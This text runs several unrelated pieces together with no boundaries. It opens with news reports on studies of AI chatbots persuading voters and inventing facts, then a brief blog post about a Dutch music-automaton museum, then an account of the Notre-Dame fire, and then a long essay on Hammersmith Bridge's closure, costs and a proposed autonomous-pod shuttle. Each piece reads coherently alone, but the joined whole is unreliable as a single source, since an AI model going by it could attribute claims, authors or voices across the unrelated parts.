In a study published in Nature on Thursday, scientists report that AI chatbots can meaningfully sway people toward a particular candidate—providing better results than video or television ads. Moreover, chatbots optimized for political persuasion “may increasingly deploy misleading or false information,” according to a separate study published on Thursday in Science.
“The general public has lots of concern around AI and election interference, but among political scientists there’s a sense that it’s really hard to change people’s opinions,” said David Rand, a professor of information science, marketing, and psychology at Cornell University and an author of both studies. “We wanted to see how much of a risk it really is.”
In the Nature study, Rand and his colleagues enlisted 2,306 U.S. citizens to converse with an AI chatbot in late August and early September 2024. The AI model was tasked both with increasing support for an assigned candidate (Harris or Trump) and with increasing the odds that a participant who initially favored the model’s candidate would vote, or decreasing the odds they would vote if the participant initially favored the opposing candidate—in other words, voter suppression.
In the U.S. experiment, the pro-Harris AI model moved likely Trump voters 3.9 points toward Harris, a shift four times larger than the impact of traditional video ads used in the 2016 and 2020 elections. Meanwhile, the pro-Trump AI model nudged likely Harris voters 1.51 points toward Trump.
The researchers ran similar experiments involving 1,530 Canadians and 2,118 Poles during the lead-up to their national elections in 2025. In the Canadian experiment, AIs advocated either for Liberal Party leader Mark Carney or Conservative Party leader Pierre Poilievre. Meanwhile, the Polish AI bots advocated for either Rafał Trzaskowski, the centrist-liberal Civic Coalition’s candidate, or Karol Nawrocki, the right-wing Law and Justice party’s candidate.
The Canadian and Polish bots were even more persuasive than those in the U.S. experiment: they shifted candidate preferences by up to 10 percentage points in many cases, roughly three times the shift seen among American participants. It’s hard to pinpoint exactly why the models were so much more persuasive to Canadians and Poles, but one significant factor could be the intense media coverage and extended campaign duration in the United States relative to the other nations.
“In the U.S., the candidates are very well-known,” Rand said. “They've both been around for a long time. The U.S. media environment also really saturates with people with information about the candidates in the campaign, whereas things are quite different in Canada, where the campaign doesn't even start until shortly before the election.”
“One of the key findings across both papers is that it seems like the primary way the models are changing people's minds is by making factual claims and arguments,” he added. “The more arguments and evidence that you've heard beforehand, the less responsive you're going to be to the new evidence.”
While the models were most persuasive when they provided fact-based arguments, they didn’t always present factual information. Across all three nations, the bot advocating for the right-leaning candidates made more inaccurate claims than those boosting the left-leaning candidates. Right-leaning laypeople and party elites tend to share more inaccurate information online than their peers on the left, so this asymmetry likely reflects the internet-sourced training data.
“Given that the models are trained essentially on the internet, if there are many more inaccurate, right-leaning claims than left-leaning claims on the internet, then it makes sense that from the training data, the models would sop up that same kind of bias,” Rand said.
With the Science study, Rand and his colleagues aimed to drill down into the exact mechanisms that make AI bots persuasive. To that end, the team tasked 19 large language models (LLMs) to sway nearly 77,000 U.K. participants on 707 political issues.
The results showed that the most effective persuasion tactic was to provide arguments packed with as many facts as possible, corroborating the findings of the Nature study. However, there was a serious tradeoff to this approach, as models tended to start hallucinating and making up facts the more they were pressed for information.
“It is not the case that misleading information is more persuasive,” Rand said. ”I think that what's happening is that as you push the model to provide more and more facts, it starts with accurate facts, and then eventually it runs out of accurate facts. But you're still pushing it to make more factual claims, so then it starts grasping at straws and making up stuff that's not accurate.”
In addition to these two new studies, research published in Proceedings of the National Academy of Sciences last month found that AI bots can now corrupt public opinion data by responding to surveys at scale. Sean Westwood, associate professor of government at Dartmouth College and director of the Polarization Research Lab , created an AI agent that exhibited a 99.8 percent pass rate on 6,000 attempts to detect automated responses to survey data.
“Critically, the agent can be instructed to maliciously alter polling outcomes, demonstrating an overt vector for information warfare,” Westwood warned in the study. “These findings reveal a critical vulnerability in our data infrastructure, rendering most current detection methods obsolete and posing a potential existential threat to unsupervised online research.”
Taken together, these findings suggest that AI could influence future elections in a number of ways, from manipulating survey data to persuading voters to switch their candidate preference—possibly with misleading or false information.
To counter the impact of AI on elections, Rand suggested that campaign finance laws should provide more transparency about the use of AI, including canvasser bots, while also emphasizing the role of raising public awareness.
“One of the key take-homes is that when you are engaging with a model, you need to be cognizant of the motives of the person that prompted the model, that created the model, and how that bleeds into what the model is doing,” he said.
Chatbots can sway people’s political opinions but the most persuasive artificial intelligence models deliver “substantial” amounts of inaccurate information in the process, according to the UK government’s AI security body.
Researchers said the study was the largest and most systematic investigation of AI persuasiveness to date, involving nearly 80,000 British participants holding conversations with 19 different AI models.
The AI Security Institute carried out the study amid fears that chatbots can be deployed for illegal activities including fraud and grooming.
The topics included “public sector pay and strikes” and “cost of living crisis and inflation”, with participants interacting with a model – the underlying technology behind AI tools such as chatbots – that had been prompted to persuade the users to take a certain stance on an issue.
Advanced models behind ChatGPT and Elon Musk’s Grok were among those used in the study, which was also authored by academics at the London School of Economics, Massachusetts Institute of Technology, the University of Oxford and Stanford University.
Before and after the chat, users reported whether they agreed with a series of statements expressing a particular political opinion.
The study , published in the journal Science on Thursday, found that “information-dense” AI responses were the most persuasive. Instructing the model to focus on using facts and evidence yielded the largest persuasion gains, the study said. However, the models that used the most facts and evidence tended to be less accurate than others.
“These results suggest that optimising persuasiveness may come at some cost to truthfulness, a dynamic that could have malign consequences for public discourse and the information ecosystem,” said the study.
On average, the AI and the human participant exchanged about seven messages each, in a conversation lasting roughly 10 minutes.
It added that tweaking a model after its initial phase of development, in a practice known as post-training, was an important factor in making it more persuasive. The study made the models, which included freely available “open source” models such as Meta’s Llama 3 and Qwen by the Chinese company Alibaba, more convincing by combining them with “reward models” that recommended the most persuasive outputs.
Researchers added that an AI system’s ability to churn out information could make it more manipulative than the most compelling human.
“Insofar as information density is a key driver of persuasive success, this implies that AI could exceed the persuasiveness of even elite human persuaders, given their unique ability to generate large quantities of information almost instantaneously during conversation,” said the report.
Feeding models personal information about the users they were interacting with did not have as big an impact as post-training or increasing information density, said the study.
Kobi Hackenburg, an AISI research scientist and one of the report’s authors, said: “What we find is that prompting the models to just use more information was more effective than all of these psychologically more sophisticated persuasion techniques.”
However, the study added that there were some obvious barriers to AIs manipulating people’s opinions, such as the amount of time a user may have to engage in a long conversation with a chatbot about politics. There are also theories suggesting there are hard psychological limits to human persuadability, researchers said.
Hackenburg said it was important to consider whether a chatbot could have the same persuasive impact in the real world where there were “lots of competing demands for people’s attention and people aren’t maybe as incentivised to sit and engage in a 10-minute conversation with a chatbot or an AI system”.
I had the pleasure of going to the Netherlands in 2023.
Amsterdam and Rotterdam are cool, but Utrecht has something really special: the Speelklok (self-playing instrument) Museum.
There’s so much cool stuff in there: automata, the only self-playing violin, clocks, draaiorgels (street organs). But the coolest is this.
That is a 1930s dance hall machine. It takes in a cardboard book with hole punches. The music is encoded as punches: each hole tells the machine to play that note from the musical staff. It replaced music barrels, the metal cylinders with nubs that strike the forks in music boxes, since the punched books could be programmed with new songs.
But somehow someone hooked up a laptop to it! So now it can play mp3s from a laptop instead of the book. What?!
How, why and who are a total mystery to me, but I’d like to find out more.
I’ve sent the museum an email and hope to hear back for more info. It’ll take about 14 business days. If you know anything about this please reach out.
Maybe the internet can help me figure this out?
- Chris
Paris, 15th April 2019, 6:43pm.
Inside the ancient cathedral all is quiet. Afternoon light filters through the stained glass.
A fire alarm pierces the silence.
Within minutes, flames tear through the oak roof. Eight centuries of timber explode into an inferno visible across the city. Parisians gather on the Seine’s banks as the spire collapses through the nave in a cascade of embers.
Hours later, the French President stands before the ruin: “Cette cathédrale, nous la rebâtirons.”
This cathedral, we will rebuild it.
On 8th December 2024, five years and seven months after the fire, Notre-Dame reopens, its spire restored, the rose windows gleaming once again.
London, 10th April 2019, 3:47pm.
Five days earlier, it’s a bright spring afternoon in west London.
On Hammersmith Bridge, traffic inches forward, suffocated by congestion. Above, the suspension chains creak under the weight of queuing cars. Cyclists weave between wing mirrors. Beneath the footpaths, invisible cracks spread deeper into the 132-year-old pedestals.
Engineers monitoring the structure see the warning signs of imminent collapse. The decision is taken: close the bridge to motor traffic immediately.
Barriers go up. The traffic melts away.
Six years later, Hammersmith Bridge remains closed to vehicles. The solution proposed by local authorities costs £250m and has no funding.
One might reasonably object that comparing Notre-Dame to Hammersmith Bridge is unfair. A Gothic cathedral and a Victorian suspension bridge are worlds apart.
Fair enough. Instead, consider this comparison: Hammersmith Bridge itself.
In 1882 , a boat struck Hammersmith Bridge causing damage that revealed five decades of deterioration. Parliament authorised a replacement in 1883 and provided for a temporary crossing. Four years later, the Prince of Wales opened a new bridge designed by Bazalgette (of London sewer fame ). Cost: £83,000 (£9.5m today). 1
In 2019 , ultrasound revealed dangerous micro-fractures in Hammersmith Bridge’s structure. The bridge was immediately closed with no temporary alternative provided. Six years later, the bridge is still closed to traffic (but stabilised). Cost to date: £48m, with full restoration estimated at £250m. Long-term solution: none.
Our Victorian forebears rebuilt their broken bridge faster than we’ve failed to find a solution for ours.
Hammersmith Bridge isn’t just a local transport problem, it’s symptomatic of Britain’s broader state crisis.
This is happening in central London. Not in a rural “backwater”, not in a “left behind” urban centre, but in one of the wealthiest communities in Britain, on a major transport artery. If Britain cannot fix Hammersmith Bridge, what is failing in places that nobody is watching?
This essay examines two questions.
First: how did Britain reach a point where we cannot fix a bridge?
Second: given that reality, what should we actually do about Hammersmith Bridge?
The first answer reveals a state crisis: every actor can block decisions; none can compel action.
The second is more surprising.
When the bridge closed, about 25,000 vehicles crossed it daily and TfL predicted a severe economic impact.
Six years later, 9,000 of those journeys have vanished - not diverted to other crossings, but simply evaporated. Yet the local economy has adapted, air quality has improved, and overall traffic congestion has lessened.
This counterintuitive outcome raises the question: are we actually solving the right problem?
The “obvious” £250m solution may be addressing the wrong issue. The best solution may cost far less, involve no cars, and turn paralysis into opportunity.
Hammersmith Bridge is a testament to Victorian engineering prowess. The present-day bridge is Bazalgette’s 1887 design: a wrought-iron suspension structure with ornate decorative features and coated in deep green paint that blends into the willow-lined bank.
It replaced an earlier bridge constructed in 1827 by local engineer William Tierney Clark . That first bridge cost £80,000 (approximately £8.9m today), was funded by private investors, and operated as a private toll bridge by the Hammersmith Bridge Company. 2 Unusually amongst London toll bridges, it turned a profit. In 1880, it was purchased by the Metropolitan Board of Works and made toll-free . 3
Clark’s designs at Hammersmith and Marlow so impressed a visiting Hungarian aristocrat that he was later commissioned to build a sister bridge in Budapest, the Széchenyi Chain Bridge over the Danube, which remains a national symbol today. 4
Fifty years later, in 1882, the aforementioned boat collision and concerns about weight capacity on Boat Race days led Parliament to authorise a replacement. 5 A temporary crossing structure was installed and just four years later, on 11th June 1887, Bazalgette’s bridge was opened at the cost of £83,000 (approximately £9.5m today). 6
For over 125 years, the bridge received minimal maintenance. 7 This is despite it being bombed three times: by the IRA in 1939, the Provisional IRA in 1996, and the Real IRA in 2000. 8 9
Only in 2014 was a comprehensive structural review first commissioned. 10
The findings were alarming: decades of unchecked corrosion had created micro-fractures throughout the suspension structure, and the Victorian bearings that allow the bridge to flex with temperature had seized solid.
In April 2019, engineers discovered that the micro-fractures had widened enough to close the bridge to vehicles, though pedestrians and cyclists could still cross. Then in August 2020’s heatwave, sensors detected rapid crack expansion. The council’s senior engineer allegedly gave the council leader just 30 seconds to make the critical decision. 11
Cast iron is unforgivingly brittle; it doesn’t bend, it shatters. With the potential for catastrophic collapse into the Thames, the bridge was completely closed, halting both pedestrian and river traffic beneath. 12
Did the review and precautionary measures save lives?
Consider Genoa’s Morandi Bridge, where a 210-metre section collapsed in August 2018, killing 43 people. The operator had warned in 2011 that collapse within 10 years was possible, yet adequate action was never taken.
Compare too Dresden’s Carola Bridge, where a 100-metre section collapsed in September 2024 just minutes after the last tram crossed. The cause was hidden stress corrosion cracking that had existed since construction in 1971.
In 2021 , stabilisation work was undertaken and the bridge’s side walkways were made accessible to pedestrians and cyclists. 13 Engineers innovatively filled the cast iron pedestals with fibre-reinforced concrete, installed steel support frames, replaced the Victorian bearings with modern rubber ones, and wrapped the chains in foil with air conditioning to keep them cool during heatwaves.
What can the stabilised bridge carry?
The local council initially claimed the post-stabilisation restriction limited vehicles to 1 tonne (equivalent to a Fiat 500). After a third FOI request and internal review, the council acknowledged the maximum allowable mass was 3 tonnes (a Volkswagen Transporter). 14 The bridge cannot support regular buses (12-18 tonnes) or normal traffic, but could theoretically support one lightweight vehicle. The stabilisation has secured the structure, but not restored its function.
In April 2025 , with stabilisation achieved, the main carriageway was reopened to cyclists and pedestrians, exactly six years after the initial closure, but remains closed to all vehicle traffic including buses and cars.
The stabilisation works to date have cost £48m, five times more than the original construction costs for the entire bridge - why is that?
The explanation lies in a fundamental shift in cost structure.
The 1887 bridge (£83,000, or £9.4m today) was dominated by material costs (perhaps 60%), with minimal professional fees and zero regulatory costs. 15
The 2019-25 stabilisation (£48m cost) inverts this cost structure: labour comprises perhaps 40%, professional fees have tripled to perhaps 18%, and regulatory compliance (a category that didn’t exist in Victorian times) consumes perhaps 12%. 16
No itemised accounts exist for either project, but these estimates are based on comparative studies of similar projects (methodology in footnotes).
There has been a profound increase in the cost of British infrastructure. This cost inflation reflects genuine progress, but of a specific kind.
The Victorians built with brutal efficiency: workers died on their projects (accepted as the cost of doing business), heritage protection was non-existent, and accountability was staked on just one engineer’s reputation.
We have replaced this with a system that is better, but also exponentially more expensive: zero-tolerance safety protocols, Grade II listing requirements, extensive insurance and oversight structures. Regulatory compliance (a category that didn’t exist in 1887) now consumes perhaps 12% of the budget.
The Victorians deployed one engineer and one contractor. The modern stabilisation required six major organisations plus multiple specialist consultancies, quangos and charities. Each improvement is defensible on its own merits. Taken together, however, they create paralysis: costs multiply, timelines extend, and every stakeholder gains effective veto power.
These aren’t individual failures but rather a systemic accumulation of red tape that paralyses progress.
The £250m restoration
The first challenging technical problem is solved: the bridge is now stabilised, albeit at significant expense.
But who will fund the complete restoration to return the bridge to its full operational capacity?
In April 2023, the local council submitted a business case to the DfT for full restoration.
That proposed solution is a double-decker system designed by Foster & Partners: vehicles on top, pedestrians in an enclosed tunnel underneath, walking through a dim passage while traffic roars above their heads.
The cost: £250m (and rising with inflation). The timeline: 10 years from approval, meaning 16+ years total since closure.
There is an irony. The entire justification for this solution is heritage preservation, yet this solution will encase the listed Victorian structure in a visual eyesore, forcing pedestrians into a claustrophobic tunnel, ruining the very heritage it claims to preserve.
Here’s where Britain’s infrastructure dysfunction becomes concrete.
Three players are each committed to funding one-third of any restoration: 17
London Borough of Hammersmith and Fulham (LBHF): Local council and bridge owner. £80m total reserves.
Transport for London (TfL) : Transport authority strategically responsible for river crossings but financially crippled despite government bailouts post-Covid. Faces a backlog of 100+ critical infrastructure repairs, with Hammersmith Bridge far down the priority list.
Department for Transport (DfT) : National government department, normally provides 85% funding for strategic bridge repairs but has slashed commitment to just 33% for Hammersmith.
Since LBHF submitted their restoration plan in April 2023, the DfT has sat on this business case.
Why have they delayed? It is very likely that the £250m restoration will fail the Treasury’s value-for-money tests, but nobody is yet willing to admit that publicly.
The benefits are modest: reconnecting two wealthy areas across a short river crossing with multiple alternatives nearby. The costs are astronomical: £250m for bespoke heritage restoration, taking 10+ years, with each party exposed to inflation risk.
For context, TfL only spent £42m in 10 years between 2010-2021 for the maintenance of all Thames river crossings.
Some would call Hammersmith Bridge a state capacity failure . But let’s be precise about what has actually failed.
Not engineering ability: British engineers remain world-class, and the stabilisation work completed so far is evidence of that. Not resources: the proposed cost is a rounding error in national budget terms.
What has failed is our political capacity: the ability to make decisions, assign responsibility, and accept trade-offs.
We’ve created a planning system in which every actor can block and add cost but where none can decide, where doing nothing is the safest choice.
In the vacuum left by years of inaction, a cottage industry of alternative proposals has emerged.
Baynes & Mitchell proposed a £110m interwoven structure. Sybarite’s inventive mirror-polished steel “ribbon” was dismissed as “another eccentric press stunt” by the council. Anthony Carlile Architects mocked up a temporary barge bridge . The Manser Practice held an internal competition yielding conceptual designs. The Richmond MP proposed licensed rickshaws . 18 LBHF council have “not ruled out” funding restoration via a resident-exempt vehicle toll (though this appears unviable on basic calculations), 19 whilst the DfT briefly considered permanent closure as a monument.
Even friends regularly offer enlightening new suggestions: inhabited bridges (funded through commercial and residential leases); a version of Wuppertal’s Schwebebahn (a public transport monorail operating since 1897); or London’s failed Garden Bridge . 20
The problem is not ingenuity. It is a system that blocks any decision-making.
Here is a more facetious proposal: award the contract to a Chinese state-owned operator.
Why China? Well, China’s bridge engineering operates at a scale that is difficult for those of us in a de-industrialised nation to comprehend.
At least 9 Chinese bridges have been built that would span the English Channel. 21
For instance, the 55km 6-lane trans-oceanic Hong Kong-Zhuhai-Macau Bridge features 23km of elevated sections, a 6.7km immersed vehicle tunnel at 45 metres below sea level, and four artificial islands , completed in just 9 years of construction . 22
The Huajiang Grand Canyon Bridge , completed in September 2025, is furnished with a “ cafe in the clouds ” and an artificial waterfall . It spans 2,890m at a height of 625m above the Beipan River and was built in less than 4 years for ~£220m ( 2.1 billion yuan ), less than the proposed restoration of Hammersmith Bridge. 23
In comparison to these mega-projects, Hammersmith Bridge seems rather modest.
But Britain is not China.
In terms of state capacity , China’s sustained construction programme generates continuous learning and accumulated expertise; Britain builds episodically and as much as half of its wage premium is due to costs rising without corresponding productivity gains. 24
But in terms of values: we demand zero construction deaths, fair wages, and democratic accountability. China’s infrastructure achievements are staggering, but they’re inseparable from its authoritarian system: bridges built without parliamentary debate, villages demolished, environmental concerns overridden, labour protections minimal. The headline costs mask 8-15 worker deaths per project, daily wages of £1-8, and lower build quality. 25
Britain’s paralysis isn’t simply incompetence, it’s the cost of worker safety, political accountability and heritage protection.
The question is not “why can’t we build like China?” but “how do we deliver infrastructure within our political and value system?”
£250m for a restoration is an extraordinary sum of money, so how about we just build a new bridge altogether?
At the January 2025 Taskforce meeting , the DfT proposed a demolition and rebuild . This proposal was rejected as legally impossible given the structure’s Grade II listing. But the heritage protection framework is policy, not immutable law. The Grade II listing was only awarded in 2008.
What would it cost simply to demolish Hammersmith Bridge and build a modern replacement?
The brief (assuming permission were granted) would be to demolish the existing structure and build a functional and safe 210-metre Thames bridge crossing at Hammersmith, carrying two vehicle lanes plus pedestrians and cyclists.
Answer : £150-225m . A complete replacement would most likely be a beam bridge and require 4-6 years from project start to completion. Overall contingency 20%. The full methodology for my estimate can be found in the footnotes. 26
There are two caveats to this estimate:
First, I’m not an engineer or architect. This estimate can in no way replace a detailed feasibility study, it is a back-of-the-envelope guess that offers a rough benchmark.
Second, this estimate underplays the vast range of uncertainty in UK infrastructure delivery . Although there is limited ambiguity in the engineering of the bridge itself, the current state of infrastructure construction in Britain means that the final price tag is highly uncertain.
Just compare other recent projects for Thames river crossings. The Rotherhithe Bridge saw costs triple from £100m to £463m before cancellation. The Lower Thames Crossing has spent over £300m on planning alone - more than Norway spent building the world’s longest road tunnel (the Laerdal Tunnel ). The Thames Tideway Tunnel escalated from £1.7bn estimate in 2004 to £4.5bn by completion in 2025. The Silvertown Tunnel cost £2.2bn for a straightforward 1.4km crossing. 27 Or consider High Speed 2 (HS2): £40.5bn spent to date (as of April 2025), having achieved very few of its stated aims. Final cost estimated at over £100bn in today’s money. 28 That includes the £100m bat tunnel and the £100m HS2 bridge to nowhere . 29
Even if the costs of a re-build were acceptable to the Treasury (they’re not) and the legal barriers were removed (they won’t be), demolition would destroy real value. £48m has already been spent stabilising the bridge and this is not simply sunk cost fallacy. The bridge now functions for cyclists, pedestrians, and motorised vehicles up to 3 tonnes, while retaining heritage significance no rebuild could match.
When projects routinely spend hundreds of millions just obtaining permission, throwing away a stabilised structure becomes hard to justify.
The bridge has been closed to motor traffic for six years. Primary school children in Barnes cannot remember when cars could cross. What began as an emergency closure has calcified into permanent car-free status through institutional paralysis.
The solution that is unfolding by default is to do nothing.
This has never been formally proposed, yet everyone’s inaction points towards it. Last month, bridge contractors filed a planning application requesting permission to transport Victorian ironwork to Brighton for long-term storage, indicating no prospect of restoration in the foreseeable future . 30 After all, it could take years or decades before political change unblocks this system to even enable a rebuild, if ever.
To do nothing would imply that vehicle access does not matter. The bridge isn’t really closed - you can still walk or cycle across. And that’s better, isn’t it? We don’t want cars in cities anyway, right? 31
No! A major London transport link has ceased to function, and there are currently no plans to address it. That should not be acceptable in a competently governed society.
We cannot accept this state of affairs.
But first, we must ask the right questions.
When I began researching this piece, my intuition was straightforward: closing a major bridge carrying 25,000 daily vehicles should lead to more traffic on other nearby crossings and less economic activity on either side.
The evidence shows the exact opposite. Today there is less traffic and more economic activity .
How is that possible?
To answer that question, we must understand:
What happened to the traffic?
What are the social and economic impacts of the closure?
Who has been genuinely disadvantaged?
When the bridge closed in 2019, 25,000 vehicles crossed it each day.
TfL predicted chaos: a July 2019 impact assessment forecast 15,000 additional motorised vehicles per day on alternative crossings and estimated “social dis-benefits to exceed £50m per annum.” Local MPs still cite these figures.
But what does the data show six years on?
Today, there is less traffic and congestion on nearby Thames crossings than before the closure.
The data shows traffic has reduced in almost all the locations where increases were initially recorded. By 2024, overall motor traffic volumes across the affected region had fallen by around 10% more than in the rest of London (25% overall). Likewise, total traffic counts on neighbouring road bridges are lower than pre-closure (charts above).
Putney Bridge shows a different idiosyncratic effect. Traffic initially fell back after the closure in 2019, but delays began to increase in 2023. That sequence of events suggests that there are other variables unrelated to the closure that are impacting travel times.
Where did the traffic go?
Cycling data provides part of the answer. Richmond Council’s survey revealed that even a few months after closure, 44% of former drivers had already switched to walking or cycling.
Cycle counts across the area are also markedly increased. This is known in the literature as a “ modal shift ”. Richmond-upon-Thames now has one of the highest active travel mode shares in Britain.
So, of the original 25,000 daily trips, most shifted to cycling, walking and public transport, and some moved to other bridges.
But here’s the puzzle: TfL reports that 9,000 vehicles (36%) have simply vanished from the road network entirely - they are no longer visible on any crossing between central London and southwest London.
What happened to those 9,000 journeys that simply evaporated?
Was economic activity lost? Were human connections severed? Did relatives stop visiting grandparents? Did businesses stop making deliveries?
The answer may lie in a counterintuitive phenomenon known as Braess’ Paradox : adding capacity to a congested network can worsen performance, while removing it can improve things. 32
When drivers make individually rational routing decisions, they reach an equilibrium where no single driver benefits from changing route, but this equilibrium is often inefficient for the system as a whole.
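To see how removing capacity can help, consider the textbook four-road version of Braess’ Paradox. The sketch below is illustrative only, using the standard toy numbers rather than Hammersmith’s actual traffic model:

```python
# Classic Braess network: 4000 drivers travel from Start to End.
# Edge costs in minutes: Start-A = n/100, A-End = 45, Start-B = 45,
# B-End = n/100, where n is the number of drivers on that edge.
DRIVERS = 4000

def route_times(split):
    """Travel times when `split` drivers take Start-A-End and the rest take Start-B-End."""
    upper = split / 100 + 45                  # Start-A-End
    lower = 45 + (DRIVERS - split) / 100      # Start-B-End
    return upper, lower

# Without a shortcut, the equilibrium is an even split: 65 minutes each way.
print(route_times(DRIVERS // 2))              # (65.0, 65.0)

# Add a free A-B shortcut. Every individual driver now prefers
# Start-A-B-End, so at equilibrium all 4000 pile onto it:
everyone_on_shortcut = DRIVERS / 100 + 0 + DRIVERS / 100
print(everyone_on_shortcut)                   # 80.0 -- all drivers are worse off
```

Remove the shortcut and everyone’s journey gets shorter again, which is the logic that a closure can trigger on a much messier real network.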
In Hammersmith’s case, the closure forced a new equilibrium. The 9,000 vanished vehicles weren’t displaced elsewhere, nor did they represent lost economic activity. They were replaced by alternatives that were more efficient in the new system.
The shopper who made three separate car trips weekly now combines errands or orders online from consolidated delivery services. The school run that meant queueing in traffic now happens on foot or by bike. The commuter who spent 20 minutes driving and searching for parking now cycles in 12 minutes.
After tube strikes, 5% of commuters permanently switch because disruption forces them to discover faster alternatives.
Hammersmith Bridge’s closure worked similarly: people tried new transport modes and often found they were better. 33
When the bridge closed, TfL predicted economic contraction. The opposite occurred.
Mastercard data shows spending in Barnes increased by twice the London average. 34 Spending increased +21% in Barnes (SW13) and +13% in Hammersmith (W6), compared to London’s +9% average. This held even when the bridge was closed to pedestrians and cyclists.
However, this aggregate spending increase does mask a more nuanced set of changes in local business composition. Data from the same Barnes Community Association survey in 2020 suggested that specialist retailers that previously relied on cross-river customers experienced revenue declines, whilst local businesses serving residential communities tended to adapt most successfully. 35
As early as 2020, the closure appears to have reshaped Barnes’ commercial character towards neighbourhood-focused businesses rather than destination retail, potentially strengthening its role as a local high street. Now, six years later, the local economy has entirely adapted to the new reality.
Reduced pollution likely increased dwell time and spending given that air quality improved at every monitoring station across the region, with nitrogen dioxide levels dropping significantly in Hammersmith, most of Barnes, and even Putney.
Emergency services have reported no impact on response times . The London Ambulance Service stated they have “never released any information about the closure impacting response times,” whilst London Fire Brigade data shows no increase in 999 response times in the Barnes peninsula.
West London’s economy hasn’t contracted; it has adapted. This isn’t suppression of activity; it’s optimisation. Economic vitality requires efficient connectivity, not maximum motorised vehicle throughput.
However, there are important confounding factors .
Since 2019, the entire urban transport landscape has transformed through three major forces largely independent of the bridge closure.
The pandemic (normalising remote work and collapsing commuter traffic), regulatory changes (Low Traffic Neighbourhoods, ULEZ expansion, 20mph zones), and new infrastructure (Elizabeth line, expanded cycling networks).
Disentangling the bridge closure’s impact from these confounding factors is nearly impossible, so it is not possible to attribute all these changes definitively to the bridge closure.
But one impact is clear: west London has adapted to reduced car dependency regardless of whether the bridge closure drove or merely coincided with these changes.
It is not necessarily the case that closing bridges improves transport; but it is undeniably true that people and places adapt when given alternatives.
Infrastructure shapes behaviour.
The closure has created genuine hardship for specific groups.
Elderly and disabled residents have been significantly disadvantaged, having lost direct bus routes across the river to Hammersmith with its step-free Tube access, retail outlets and major hospital. 36 Low-income residents have been disproportionately affected. They’re less likely to own cars or bikes, cannot afford taxi detours, and have lost affordable public transport options. Parents with young children face new challenges. Cycling is not always an option, so any journey across the river has become significantly harder.
Specialised retailers have also lost business. Whilst generic local businesses saw spending increases, specialised retailers relying on customers from across London experienced revenue reductions. Similarly, tradespeople and businesses requiring vehicle access face longer detours. Plumbers, electricians, and builders transporting heavier tools lose time and income. Commercial motorised vehicles merit particular attention given ULEZ parallels, where delivery operators have raised concerns about regulatory burdens. However, unlike ULEZ, the bridge closure affects routing rather than compliance costs.
As a local resident who crosses the bridge every week, I see both sides of this argument:
For certain residents and businesses, the closure has created genuine hardship. Equally, however, the constant gridlock has vanished, the local economy has adapted, and cycling - previously a life-threatening exercise - is now pleasant and safe.
The harms are real, but they do not require a £250m car-restoration project. They require targeted public transport solutions.
Ask residents if they want the bridge reopened to all traffic and the answer is obvious: yes.
Maximum choice will always seem the most convenient option.
But that is the wrong question to be asking. As we have established, a full restoration would cost £250m, take years, and likely require a significant vehicle toll.
Given that reality, what’s the best option?
A 2023 poll tested this exact trade-off, and the response from residents was clear. If the alternative was a toll bridge, 50% of respondents would prefer a car-free bridge with cycling, walking and electric shuttles, with 36% in favour of tolling. Similar results were shown in a FareCity survey from 2019.
Given the actual constraints and costs, residents prefer targeted public transport solutions over expensive vehicular restoration.
Finally, we should address a claim that has shaped the entire debate.
Labour Council leader Stephen Cowan has repeatedly stated that the bridge is “legally required to reopen to cars,” indicating that the Secretary of State instructed him on the council’s “Highways obligations.” This assertion has anchored political negotiations around how to restore full vehicular capacity. Mayor Sadiq Khan has also expressed a desire to re-open the bridge to cars .
But in November 2022, the Department for Transport’s Freedom of Information response categorically contradicted this claim:
“The Department has not given any legal instructions to London Borough of Hammersmith and Fulham regarding the management of the bridge – officials and Ministers have been clear that LBHF is the asset owner and decisions on maintenance and repair are for it to take.”
As the owner, there is no clear legal requirement for the Council to reopen the bridge to cars (as they have likely met their statutory obligations, 37 although any formal highway downgrading would require Traffic Regulation Orders under established statutory procedures). 38
This distinction is not semantic pedantry. If the obligation is political rather than statutory, then the solution space is fundamentally different. The council is not legally bound to pursue a £250m vehicular restoration. It could instead solve the actual mobility problem: providing public transport across the river for those who need it (which may itself be a statutory obligation). 39
Yet this premise has locked the debate around restoring the existing structure to full vehicular capacity.
So what might a solution look like?
In May 2023, a credible and equitable solution for Hammersmith Bridge was proposed, fully designed and costed.
It cost £10m (25x cheaper than the Foster & Partners solution), permitted cycling and walking, fulfilled public transport needs, and crucially abided by the stabilisation’s weight restrictions.
Ten-passenger autonomous electric pods , running every 2-3 minutes during peak times. Each pod weighs under 3 tonnes when fully loaded , comfortably within the bridge’s limits. The fleet would carry 235-282 passengers per hour . Full integration with Oyster cards and contactless payment. A protected two-way cycle lane alongside and pedestrian walkways. Restructured bus routes. The pods would operate in a single lane with passing points at either end. 40
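As a rough sanity check on those throughput figures (my own back-of-the-envelope arithmetic, not the methodology of the Possible report), the headway and pod capacity alone pin down the order of magnitude:

```python
# Rough throughput check for a single-lane shuttle with passing points.
# The inputs are my illustrative assumptions; the report's 235-282
# passengers/hour reflects its own occupancy and turnaround modelling.
capacity = 10                         # passengers per pod
for headway_min in (2, 2.5, 3):
    departures_per_hour = 60 / headway_min
    passengers_per_hour = departures_per_hour * capacity
    print(f"{headway_min} min headway -> {passengers_per_hour:.0f} passengers/hour")

# 2-3 minute headways give roughly 200-300 passengers/hour, broadly
# consistent with the 235-282 figure quoted above.
```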
Total cost: £10m . Pod fleet (£3m), highways remodelling (£3.7m), public realm improvements (£0.5m), contingency (£2.8m). Timeline: 24-36 months from approval to operational.
The charity Possible spent 18 months developing this autonomous pod system for Hammersmith Bridge. The solution uses proven technology from New Zealand provider Ohmio . The pods are already used today in New Zealand and multiple international airports .
This solution addresses the genuine harms identified earlier. The autonomous pod system provides:
Public transport for those without alternatives : elderly and disabled residents regain direct access to Hammersmith with step-free boarding, young families can cross safely, low-income residents get affordable Oyster-integrated transport.
Reduced congestion for essential and commercial vehicle users : with 9,000 trips already evaporated and additional travellers using pods, tradespeople and businesses would experience a net benefit from reduced congestion on alternative crossings.
This is why the pod solution isn’t just cheaper than the £250m restoration - it’s better.
Why autonomous pods rather than conventional public transport? Standard buses weigh 12-18 tonnes, far exceeding the bridge’s 3-tonne limit. Trams require expensive track infrastructure and permanent structural modifications, the weight of which would be incompatible with heritage constraints. 41 Autonomous pods solve this through lightweight design: each 10-passenger pod weighs under 3 tonnes fully loaded, with ten pods providing equivalent capacity whilst staying within structural limits. The system eliminates driver costs (60-70% of bus operating expenses) whilst enabling 2-3 minute headways impossible with human drivers, maximising throughput and cost-efficiency.
